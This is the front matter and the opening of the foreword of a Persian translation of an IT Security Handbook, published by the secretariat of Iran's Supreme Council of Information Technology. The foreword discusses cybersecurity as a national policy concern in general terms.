Professional Documents
Culture Documents
GR IT Security Handbook 840707
GR IT Security Handbook 840707
ﺗﺄﻟﻴﻒ:
ﺟﻮﺭﺝ ﺳﺎﺩﻭﺳـﻜﺎﻱ
ﺟﻴﻤﺰ ﺍﻛﺲ .ﺩﻣﭙﺰﻱ
ﺁﻟـﻦ ﮔﺮﻳﻦﺑﺮﮒ
ﺑﺎﺭﺑﺎﺭﺍ ﺟﻲ .ﻣﻚ
ﺁﻟـﻦ ﺷﻮﺍﺭﺗﺰ
ﺗﺮﺟﻤﺔ:
ﻣﻬﺪﻱ ﻣﻴﺮﺩﺍﻣـﺎﺩﻱ
ﺯﻫــﺮﺍ ﺷﺠــﺎﻋﻲ
ﻣﺤﻤﺪﺟﻮﺍﺩ ﺻﻤﺪﻱ
ﺩﺑﻴﺮﺧﺎﻧﻪ
ﺷﻮﺭﺍﻱﻋﺎﻟﻲ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ
ﺗﻴﺮﻣﺎﻩ ۱۳۸۴
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ = / IT Security Handbookﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﺟﻮﺭﺝ ﺳﺎﺩﻭﺳﮑﺎﻱ ] ...ﻭ ﺩﻳﮕﺮﺍﻥ[؛ ﮔﺮﻭﻩ ﻣﺘﺮﺟﻤﻴﻦ ﻣﻬﺪﻱ
ﻣﻴﺮﺩﺍﻣﺎﺩﻱ ،ﺯﻫﺮﺍ ﺷﺠﺎﻋﻲ ،ﻣﺤﻤﺪﺟﻮﺍﺩ ﺻﻤﺪﻱ -- .ﺗﻬﺮﺍﻥ ،ﺷﻮﺭﺍﻱ ﻋﺎﻟﻲ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ ،ﺩﺑﻴﺮﺧﺎﻧﻪ.۱۳۸۴ ،
۵۰۹ﺹ:.ﺟﺪﻭﻝ ۵۰،۰۰۰ .ﺭﻳﺎﻝ
ISBN: 964-8846-26-x
IT Security Handbook ﻋﻨﻮﺍﻥ ﺑﻪ ﺍﻧﮕﻠﻴﺴﻲ:
ﻓﻬﺮﺳﺘﻨﻮﻳﺴﻲ ﺑﺮ ﺍﺳﺎﺱ ﺍﻃﻼﻋﺎﺕ ﻓﻴﭙﺎ.
ﮐﺘﺎﺑﻨﺎﻣﻪ :ﺹ۵۰۹ .؛ ﻫﻤﭽﻨﻴﻦ ﺑﻪ ﺻﻮﺭﺕ ﺯﻳﺮﻧﻮﻳﺲ .ﻧﻤﺎﻳﻪ.
.۱ﺗﮑﻨﻮﻟﻮﮊﻱ ﺍﻃﻼﻋﺎﺕ --ﺍﻗﺪﺍﻣﺎﺕ ﺗﺄﻣﻴﻨﻲ .ﺍﻟﻒ .ﺳﺎﺩﻭﺳﮑﺎﻱ ،ﺟﻮﺭﺝ .Sadowsky ،George ،ﺏ.ﻣﻴﺮﺩﺍﻣﺎﺩﻱ ،ﻣﻬﺪﻱ ،- - ۱۳۵۹ -ﻣﺘﺮﺟﻢ.
ﺝ.ﺷﺠﺎﻋﻲ ،ﺯﻫﺮﺍ ،ﻣﺘﺮﺟﻢ .ﺩ.ﺻﻤﺪﻱ ،ﻣﺤﻤﺪﺟﻮﺍﺩ ،ﻣﺘﺮﺟﻢ .ﻫـ .ﺷﻮﺭﺍﻱ ﻋﺎﻟﻲ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ .ﺩﺑﻴﺮﺧﺎﻧﻪ .ﻭ.ﻋﻨﻮﺍﻥ.
۳۰۳/۴۸۳۳ ۱۳۸۴ ۲۳ﺭT۵۸/۵/
ﻼ ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﺑﺮﺍﻱ ﺑـﺸﺮ ﺑـﻮﺩﻩ ﻭ ﻫـﺴﺖ .ﺩﺭ ﺩﻭﺭﺍﻥ ﻣﺎﻗﺒـﻞ ﺗـﺎﺭﻳﺦ ،ﺍﻣﻨﻴـﺖ ﻣﻔﻬﻮﻡ ﺍﻣﻨﻴﺖ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻣﻔﻬﻮﻣﻲ ﺣﻴﺎﺗﻲ ﻭ ﻛﺎﻣ ﹰ
ﻼ ﻓﻴﺰﻳﻜﻲ ﺭﺍ ﺷﺎﻣﻞ ﻣﻲﺷﺪ ﻛﻪ ﻋﺒﺎﺭﺕ ﺑﻮﺩ ﺍﺯ ﺍﺻﻮﻝ ﺣﻔﻆ ﺑﻘﺎ ﻧﻈﻴﺮ ﺍﻣﻨﻴﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻠﺔ ﺩﻳﮕﺮﺍﻥ ﻳﺎ ﺣﻴﻮﺍﻧﺎﺕ ﻭ ﻧﻴـﺰ ﺍﻣﻨﻴـﺖ ﻣﻔﻬﻮﻣﻲ ﻛﺎﻣ ﹰ
ﺗﺄﻣﻴﻦ ﻏﺬﺍ .ﺑﺘﺪﺭﻳﺞ ﻧﻴﺎﺯﻫﺎﻱ ﺩﻳﮕﺮﻱ ﭼﻮﻥ ﺍﻣﻨﻴﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻮﺍﺩﺙ ﻃﺒﻴﻌﻲ ﻳﺎ ﺑﻴﻤﺎﺭﻳﻬﺎ ﻭ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻦ ﻣﻜﺎﻧﻲ ﺑﺮﺍﻱ ﺯﻧﺪﮔﻲ ﻭ ﺍﺳﺘﺮﺍﺣﺖ
ﺑﺪﻭﻥ ﻣﻮﺍﺟﻬﻪ ﺑﺎ ﺧﻄﺮ ﺑﻪ ﻧﻴﺎﺯﻫﺎﻱ ﭘﻴﺸﻴﻦ ﺑﺸﺮ ﺍﻓﺰﻭﺩﻩ ﺷﺪ .ﺑﺎ ﭘﻴـﺸﺮﻓﺖ ﺗﻤـﺪﻥ ﻭ ﺷـﻜﻞﮔﻴـﺮﻱ ﺟﻮﺍﻣـﻊ ،ﻣﺤـﺪﻭﺩﺓ ﺍﻣﻨﻴـﺖ ﺍﺑﻌـﺎﺩ ﺑـﺴﻴﺎﺭ
ﮔﺴﺘﺮﺩﻩﺗﺮﻱ ﻳﺎﻓﺖ ﻭ ﺑﺎ ﺗﻔﻜﻴﻚ ﺣﻮﺯﺓ ﺍﻣﻮﺍﻝ ﻭ ﺣﻘﻮﻕ ﺷﺨﺼﻲ ﺍﻓﺮﺍﺩ ﺍﺯ ﻳﻜﺪﻳﮕﺮ ﻭ ﺍﺯ ﺍﻣﻮﺍﻝ ﻋﻤﻮﻣﻲ ،ﻭ ﻫﻤﭽﻨﻴﻦ ﺗﻌﺮﻳﻒ ﻗﻠﻤﺮﻭﻫﺎﻱ ﻣﻠﻲ ﻭ
ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ،ﺑﺘﺪﺭﻳﺞ ﻣﻔﺎﻫﻴﻢ ﻭﺳﻴﻌﻲ ﻣﺎﻧﻨﺪ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ،ﺍﻣﻨﻴﺖ ﺍﺟﺘﻤﺎﻋﻲ ،ﺍﻣﻨﻴﺖ ﻣﺎﻟﻲ ،ﺍﻣﻨﻴﺖ ﺳﻴﺎﺳﻲ ،ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﻭ ﺍﻣﻨﻴﺖ ﺍﻗﺘـﺼﺎﺩﻱ
ﻼ ﻣﺤﺪﻭﺩ ﺑﻪ ﻧﻴﺎﺯﻫﺎﻱ ﻓﻴﺰﻳﻜﻲ ﺑﺸﺮ ﻧﻤﻲﺷﺪﻧﺪ ،ﻭﻟﻲ ﻋﻤﺪﺗﹰﺎ ﺗﺤﻘﻖ ﻭ ﺩﺳـﺘﻴﺎﺑﻲ ﺑـﻪ ﺁﻧﻬـﺎ ﺭﺍ ﻧﻴﺰ ﺷﺎﻣﻞ ﮔﺮﺩﻳﺪ .ﺍﻳﻦ ﻣﻔﺎﻫﻴﻢ ﮔﺮﭼﻪ ﺩﻳﮕﺮ ﻛﺎﻣ ﹰ
ﻣﺴﺘﻠﺰﻡ ﻭﺟﻮﺩ ﻭ ﻳﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺤﻴﻂﻫﺎﻱ ﻭﺍﻗﻌﻲ ﻭ ﻓﻴﺰﻳﻜﻲ ﺑﻮﺩ.
ﻟﻴﻜﻦ ﺟﻬﺎﻥ ﺩﺭ ﺩﻫﻪﻫﺎﻱ ﺍﺧﻴﺮ ﻭ ﺑﻮﻳﮋﻩ ﺩﺭ ﭘﻨﺞ ﺳﺎﻝ ﮔﺬﺷﺘﻪ ﻋﺮﺻﺔ ﺗﺤﻮﻻﺕ ﭼﺸﻤﮕﻴﺮﻱ ﺑﻮﺩﻩ ﻛﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻨﺎﺳﺒﺎﺕ ﻭ ﻣﻌـﺎﺩﻻﺕ
ﭘﻴﺸﻴﻦ ﺭﺍ ﺑﻄﻮﺭ ﺍﺳﺎﺳﻲ ﺩﺳﺘﺨﻮﺵ ﺗﻐﻴﻴﺮ ﻧﻤﻮﺩﻩ ﺍﺳﺖ .ﺍﻳﻦ ﺗﺤﻮﻻﺕ ﻛﻪ ﺑﺎ ﻣﺤﻮﺭﻳﺖ ﻛـﺎﺭﺑﺮﻱ ﻭﺳـﻴﻊ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ
ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺷﺪﻩ ،ﺍﺯ ﻛﺎﺭﺑﺮﺩ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﻋﻨﻮﺍﻥ ﺍﺑﺰﺍﺭ ﺧﻮﺩﻛﺎﺭﺳﺎﺯﻱ ) (Automationﻭ ﺍﻓﺰﺍﻳﺶ ﺑﻬﺮﻩﻭﺭﻱ ﺁﻏـﺎﺯ ﮔﺮﺩﻳـﺪﻩ ﻭ ﺍﻛﻨـﻮﻥ ﺑـﺎ ﺗﻜﺎﻣـﻞ
ﻼ ﺯﻧﺪﮔﻲ ﻓﺮﺩﻱ ﻭ ﺍﺟﺘﻤﺎﻋﻲ ﺑﺸﺮ ﺭﺍ ﺩﮔﺮﮔﻮﻥ ﺳﺎﺧﺘﻪ ﺍﺳﺖ .ﺑـﻪ ﻛﺎﺭﺑﺮﻱ ﺁﻥ ﺩﺭ ﺍﻳﺠﺎﺩ ﻓﻀﺎﻱ ﻫﻢﺍﻓﺰﺍﺋﻲ ﻣﺸﺎﺭﻛﺘﻲ ) ،(Collaborationﻋﻤ ﹰ
ﺑﺎﻭﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺻﺎﺣﺒﻨﻈﺮﺍﻥ ﻫﻤﺎﻧﮕﻮﻧﻪ ﮐﻪ ﭘﻴﺪﺍﻳﺶ ﺧﻂ ﻭ ﮐﺘﺎﺑﺖ ﺁﻧﭽﻨﺎﻥ ﺗﺄﺛﻴﺮ ﺷﮕﺮﻓﻲ ﺑﺮ ﺳﺮﻧﻮﺷﺖ ﺍﻧﺴﺎﻥ ﺑﺮﺟﺎﻱ ﮔﺬﺍﺷﺘﻪ ﮐﻪ ﻣـﻮﺭﺧﻴﻦ
ﺭﺍ ﺑﺮﺁﻥ ﺩﺍﺷﺘﻪ ﺗﺎ ﺩﺍﺳﺘﺎﻥ ﺯﻧﺪﮔﻲ ﺑﺸﺮ ﺑﺮ ﺍﻳﻦ ﮐﺮﻩ ﺧﺎﮐﻲ ﺭﺍ ﺑﻪ ﺩﻭﺭﺍﻥ ﻣﺎ ﻗﺒﻞ ﺗﺎﺭﻳﺦ ﻭ ﺗـﺎﺭﻳﺦ ﺗﻘـﺴﻴﻢ ﻧﻤﺎﻳﻨـﺪ ،ﻭﺭﻭﺩ ﺑـﻪ ﻓـﻀﺎﻱ ﻣﺠـﺎﺯﻱ
ﺣﺎﺻﻞ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﻧﻮﻳﻦ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻧﻴﺰ ﺩﻭﺭﺓ ﺟﺪﻳﺪﻱ ﺍﺯ ﺗﻤﺪﻥ ﺑﺸﺮﻱ ﺭﺍ ﺭﻗﻢ ﺯﺩﻩ ،ﺑﻨﺤﻮﻱ ﻛﻪ ﺍﻧﻘﻼﺏ ﻋﺼﺮ ﺍﻃﻼﻋـﺎﺕ ﺷـﻴﻮﺓ
ﺍﻧﺪﻳﺸﻪ ،ﺗﻮﻟﻴﺪ ،ﻣﺼﺮﻑ ،ﺗﺠﺎﺭﺕ ،ﻣﺪﻳﺮﻳﺖ ،ﺍﺭﺗﺒﺎﻁ ،ﺟﻨﮓ ﻭ ﺣﺘﻲ ﺩﻳﻨﺪﺍﺭﻱ ﻭ ﻋﺸﻖﻭﺭﺯﻱ ﺭﺍ ﺩﮔﺮﮔﻮﻥ ﺳﺎﺧﺘﻪ ﺍﺳﺖ.
ﺍﻳﻦ ﺗﺤﻮﻝ ﺑﺰﺭﮒ ﺍﻟﺰﺍﻣﺎﺕ ﻭ ﺗﺒﻌﺎﺕ ﻓﺮﺍﻭﺍﻧﻲ ﺭﺍ ﺑﻪ ﻫﻤﺮﺍﻩ ﺩﺍﺷﺘﻪ ﻛﻪ ﺍﺯ ﻣﻬﻤﺘﺮﻳﻦ ﺁﻧﻬﺎ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻥ ﻣﻔﺎﻫﻴﻢ ﻧﻮﻳﻦ ﺍﻣﻨﻴـﺖ ﻣﺠـﺎﺯﻱ ﻳـﺎ
ﺍﻣﻨﻴﺖ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻣﻲﺑﺎﺷﺪ .ﺑﺎ ﺗﻐﻴﻴﺮﻱ ﻛﻪ ﺩﺭ ﺍﻃﻼﻕ ﻋﺒﺎﺭﺕ "ﺷﺒﻜﺔ ﺭﺍﻳﺎﻧـﻪﺍﻱ" ﺍﺯ ﻳـﻚ ﺷـﺒﻜﺔ ﻛﻮﭼـﻚ ﻛـﺎﺭﮔﺮﻭﻫﻲ ﺑـﻪ ﺷـﺒﻜﻪﺍﻱ
ﮔﺴﺘﺮﺩﻩ ﻭ ﺟﻬﺎﻧﻲ )ﺍﻳﻨﺘﺮﻧﺖ( ﻭﺍﻗﻊ ﮔﺮﺩﻳﺪﻩ ،ﻭ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺭﺷﺪ ﺭﻭﺯﺍﻓﺰﻭﻥ ﺗﻌﺎﻣﻼﺕ ﻭ ﺗﺒـﺎﺩﻻﺗﻲ ﻛـﻪ ﺭﻭﻱ ﺷـﺒﻜﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺻـﻮﺭﺕ
ﻣﻲﭘﺬﻳﺮﺩ ،ﻧﻴﺎﺯ ﺑﻪ ﻧﻈﺎﻡﻫﺎﻱ ﺣﻔﺎﻇﺖ ﻭ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺟﻬﺖ ﺿﻤﺎﻧﺖ ﻣﺒﺎﺩﻻﺕ ﻭ ﺍﻳﺠﺎﺩ ﺗﻌﻬﺪ ﻗﺎﻧﻮﻧﻲ ﺑﺮﺍﻱ ﻃﺮﻓﻬﺎﻱ ﺩﺧﻴﻞ ﺩﺭ ﻣﺒﺎﺩﻟـﻪ
ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ ﺍﺳﺖ .ﻧﻈﺎﻡﻫﺎﻳﻲ ﻣﺸﺘﻤﻞ ﺑﺮ ﻗﻮﺍﻧﻴﻦ ،ﺭﻭﺷﻬﺎ ،ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻭ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺣﺘﻲ ﺍﺯ ﻋﻘﻮﺩ ﻣﺘﺪﺍﻭﻝ ﻭ ﺭﻭﺷﻬﺎﻱ ﺳﻨﺘﻲ ﺗﻌﻬﺪﺁﻭﺭﺗﺮ
ﺑﻮﺩﻩ ﻭ ﺿﻤﻨﹰﺎ ﺍﻣﻨﻴﺖ ﻭ ﺧﺼﻮﺻﻲ ﺑﻮﺩﻥ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﻣﺒﺎﺩﻟﻪﺷﺪﻩ ﺭﺍ ﺑﻴﺶ ﺍﺯ ﭘﻴﺶ ﺗﻀﻤﻴﻦ ﻧﻤﺎﻳﻨﺪ.
ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﺤﻴﻂﻫﺎﻱ ﻣﺠﺎﺯﻱ ﻫﻤﻮﺍﺭﻩ ﺑﻌﻨﻮﺍﻥ ﻳﻜﻲ ﺍﺯ ﺯﻳﺮﺳﺎﺧﺘﻬﺎ ﻭ ﺍﻟﺰﺍﻣﺎﺕ ﺍﺳﺎﺳـﻲ ﺩﺭ ﻛـﺎﺭﺑﺮﻱ ﺗﻮﺳـﻌﻪﺍﻱ ﻭ ﻓﺮﺍﮔﻴـﺮ ﺍﺯ
ICTﻣﻮﺭﺩ ﺗﺎﻛﻴﺪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ .ﮔﺮﭼﻪ ﺍﻣﻨﻴﺖ ﻣﻄﻠﻖ ﭼﻪ ﺩﺭ ﻣﺤﻴﻂ ﻭﺍﻗﻌﻲ ﻭ ﭼﻪ ﺩﺭ ﻓﻀﺎﻱ ﻣﺠﺎﺯﻱ ﺩﺳﺖﻧﻴـﺎﻓﺘﻨﻲ ﺍﺳـﺖ ،ﻭﻟـﻲ ﺍﻳﺠـﺎﺩ
ﺳﻄﺤﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﻛﻪ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﻓﻲ ﻭ ﻣﺘﻨﺎﺳﺐ ﺑﺎ ﻧﻴﺎﺯﻫﺎ ﻭ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺑﺎﺷﺪ ﺗﻘﺮﻳﺒﹰﺎ ﺩﺭ ﺗﻤﺎﻣﻲ ﺷﺮﺍﻳﻂ ﻣﺤﻴﻄـﻲ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ
ﺍﺳﺖ .ﺗﻨﻬﺎ ﺑﺎ ﻓﺮﺍﻫﻢ ﺑﻮﺩﻥ ﭼﻨﻴﻦ ﺳﻄﺢ ﻣﻄﻠﻮﺑﻲ ﺍﺳﺖ ﻛﻪ ﺍﺷﺨﺎﺹ ﺣﻘﻴﻘﻲ ،ﺳﺎﺯﻣﺎﻧﻬﺎ ،ﺷﺮﻛﺘﻬﺎﻱ ﺧـﺼﻮﺻﻲ ﻭ ﺍﺭﮔﺎﻧﻬـﺎﻱ ﺩﻭﻟﺘـﻲ ﺿـﻤﻦ
ﻻ ﻫﻴﭽﮕـﺎﻩ ﻳﻜـﺪﻳﮕﺮ ﺭﺍ ﻧﺪﻳـﺪﻩ ﻭ
ﺍﻋﺘﻤﺎﺩ ﻭ ﺍﻃﻤﻴﻨﺎﻥ ﺑﻪ ﻃﺮﻓﻬﺎﻱ ﮔﻮﻧﺎﮔﻮﻧﻲ ﻛﻪ ﻫﻤﮕﻲ ﺩﺭ ﻳﻚ ﺗﺒﺎﺩﻝ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺧﻴﻞ ﻫﺴﺘﻨﺪ ﻭ ﺍﺣﺘﻤـﺎ ﹰ
ﻧﻤﻲﺷﻨﺎﺳﻨﺪ ،ﻧﻘﺶ ﻣﻮﺭﺩ ﺍﻧﺘﻈﺎﺭ ﺧﻮﺩ ﺑﻌﻨﻮﺍﻥ ﮔﺮﻩﺍﻱ ﻣﺆﺛﺮ ﺍﺯ ﺍﻳﻦ ﺷﺒﻜﻪ ﻣﺘﻌﺎﻣﻞ ﻭ ﻫﻢﺍﻓﺰﺍ ﺭﺍ ﺍﻳﻔﺎ ﺧﻮﺍﻫﻨﺪ ﻧﻤﻮﺩ.
ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻤﻦ ﺑﻮﺩﻥ ﺳﺮﻣﺎﻳﻪ ﻫﺎﯼ ﺍﻃﻼﻋﺎﺗﯽ ﻭ ﺗﺠﻬﻴﺰﺍﺕ ﺯﻳﺮﺳﺎﺧﺘﻲ ﻛﺸﻮﺭ ﮔﺬﺷﺘﻪ ﺍﺯ ﺍﺑﻌـﺎﺩ ﮔـﺴﺘﺮﺩﻩ ﺍﻣﻨﻴـﺖ ﻣﻠـﻲ ،ﮐﻠﻴـﺪ ﻗﻔـﻞ
ﻓﺮﺻﺘﻬﺎﯼ ﺑﯽﺷﻤﺎﺭ ﺗﺠﺎﺭﯼ ﻭ ﻏﻴﺮﺗﺠﺎﺭﯼ ﺟﺪﻳﺪ ﺍﻳﻨﺘﺮﻧﺘﯽ ﺍﺳﺖ .ﺁﻧﭽﻪ ﻣﺴﻠﻢ ﺍﺳﺖ ﭼـﺎﻟﺶ ﺍﻣﻨﻴﺘـﯽ ﺭﻭﺩﺭﺭﻭﻱ ﻛـﺸﻮﺭ ﻋـﺪﻡ ﺩﺳﺘﺮﺳـﯽ ﺑـﻪ
ﻓﻨﺎﻭﺭﻱ ﻭ ﻳﺎ ﻋﺪﻡ ﻭﺟﻮﺩ ﻣﺤﺼﻮﻻﺕ ﺍﻣﻨﻴﺘﯽ ﻧﻴﺴﺖ ،ﺑﻠﮑﻪ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ،ﻓﺮﻫﻨﮓﺳﺎﺯﻱ ،ﺑﻬﺮﻩﻭﺭﻱ ﻣﻨﺎﺳﺐ ﺍﺯ ﻣﻨﺎﺑﻊ ﻣﻮﺟﻮﺩ ﻭ ﻧﻴﺰ ﺳﺎﺯﮔﺎﺭﯼ
ﺁﻧﻬﺎ ﺑﻪ ﮔﻮﻧﻪﺍﯼ ﺍﺳﺖ ﮐﻪ ﻧﻴﺎﺯ ﻣﻨﺤﺼﺮﺑﻪﻓﺮﺩ ﺷﺒﮑﻪ ﻭ ﻓﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻛﺸﻮﺭ ﺭﺍ ﺗﺄﻣﻴﻦ ﮐﻨﺪ .ﺩﺭ ﺍﻳﻦ ﺭﺍﺳﺘﺎ ﺗﻮﺟﻪ ﺑـﻪ ﺍﻳـﻦ ﻧﻜﺘـﻪ ﺿـﺮﻭﺭﻱ
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٨
ﺍﺳﺖ ﻛﻪ ﻣﻌﻤﺎﺭﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻓﺮﺁﻳﻨﺪﻱ ﺍﺯ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺟﺎﺭﻱ ﺩﺭ ﻣﻌﻤـﺎﺭﻱ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﺳـﻄﻮﺡ ﻣﺨﺘﻠـﻒ ﺍﻋـﻢ ﺍﺯ ﻣﻠـﻲ ﻭ
ﺳﺎﺯﻣﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ﺑﻪ ﺗﻨﺎﺳﺐ ﻭ ﻧﻴﺎﺯ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻻﺯﻡ ﺍﺳﺘﻔﺎﺩﻩ ﺧﻮﺍﻫﺪ ﺷﺪ .ﻧﻜﺘﺔ ﻣﻬﻢ ﺩﻳﮕﺮ ﺣﺎﺻﻞ ﺍﺯ ﺗﺠـﺎﺭﺏ ﻛـﺸﻮﺭﻫﺎﻱ
ﭘﻴﺸﺮﻭ ﺣﺎﻛﻲ ﺍﺳﺖ ﻛﻪ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻣﺴﺄﻟﻪﺍﻱ ﻓﺮﺍﺑﺨﺸﻲ ﺍﺳﺖ ﻭ ﻧﻴﺎﺯ ﺑﻪ ﻫﻤﻜﺎﺭﻳﻬﺎﻱ ﮔﺴﺘﺮﺩﻩ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺩﺍﺭﺩ .ﺍﻳﻦ ﻫﻤﻜﺎﺭﻳﻬﺎ ﻫـﻢ
ﺩﺭ ﺳﻄﺢ ﻣﻠﻲ ﻭ ﻫﻢ ﺩﺭ ﺳﻄﺢ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﮔﻴﺮﺩ .ﺗﻌﻴﻴﻦ ﻧﻘﺸﻬﺎ ،ﻭﻇﺎﻳﻒ ﻭ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺍﺯ ﻧﻜﺎﺕ ﻣﻬﻤﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺍﻳﻦ
ﻫﻤﻜﺎﺭﻳﻬﺎ ﺑﺎﻳﺪ ﺗﻌﺮﻳﻒ ﺷﻮﻧﺪ.
ﺍﻣﺮﻭﺯﻩ ﺍﻣﻨﻴﺖ ﻓﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ ﻭﺟﻪ ﺗﺎﺯﻩﺍﻱ ﺍﺯ ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﻫﺮ ﻛﺸﻮﺭ ﺭﺍ ﺑﻪ ﺗﺼﻮﻳﺮ ﻣﻲﻛﺸﺪ .ﺍﻣﻴﺪ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﻣﻮﺍﺯﺍﺕ ﺗﻮﺳﻌﻪ ﺳـﺮﻳﻊ
ﻛﺎﺭﺑﺮﻱﻫﺎﻱ ﮔﻮﻧﺎﮔﻮﻥ ﻓﻨﺎﻭﺭﻱ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺯﻳﺮﺑﺨﺸﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺩﺭ ﭘﻮﺷﺶ ﺑﺮﻧﺎﻣﺔ ﺗﻜﻔﺎ ،ﺑﺎ ﺷﻨﺎﺧﺖ ﻭ ﺗﻌﻴﻴﻦ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ
ﻛﻠﻴﺪﻱ ﻛﺸﻮﺭ ﻛﻪ ﻭﺍﺑﺴﺘﮕﻲ ﺣﻴﺎﺗﻲ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﺩﺍﺭﻧﺪ ﻭ ﺳﭙﺲ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ،ﺳﺎﺯﻣﺎﻧﺪﻫﻲ ﻭ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻣﻨﺎﺳﺐ ﺟﻬﺖ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻳـﻦ
ﺯﻳﺮﺳﺎﺧﺘﻬﺎ ،ﻣﺴﻴﺮ ﺗﻮﺳﻌﺔ ﻫﻤﻪﺟﺎﻧﺒﺔ ﻛﺸﻮﺭ ﺩﺭ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺟﺎﻣﻌﺔ ﺩﺍﻧﺎﻳﻲﻣﺤﻮﺭ ﻫﻤﻮﺍﺭ ﮔﺮﺩﺩ.
ﺧﻮﺷﺒﺨﺘﺎﻧﻪ ﺩﺭ ﻃﻲ ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴﺮ ﻭ ﭘﺲ ﺍﺯ ﺗﺼﻮﻳﺐ ﺑﺮﻧﺎﻣﺔ ﺗﻮﺳﻌﺔ ﻭ ﻛﺎﺭﺑﺮﻱ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ )ﺗﻜﻔﺎ( ﺩﺭ ﻫﻴـﺄﺕ ﺩﻭﻟـﺖ
ﻛﻪ ﻧﺸﺎﻥ ﺍﺯ ﺗﻮﺟﻪ ﻭ ﺑﻴﻨﺶ ﻣﺪﻳﺮﻳﺖ ﺍﺭﺷﺪ ﻛﺸﻮﺭ ﺩﺭ ﺭﻭﻳﻜﺮﺩ ﻧﻮﻳﻦ ﺑﻪ ﺗﻮﺳﻌﻪ ﻛﺸﻮﺭ ﺩﺍﺷـﺘﻪ ،ﻣﻄﺎﻟﻌـﺎﺕ ﻭ ﺑﺮﺭﺳـﻴﻬﺎﻱ ﻓﻨـﻲ ﺑـﺮﺍﻱ ﺗﻤﻬﻴـﺪ
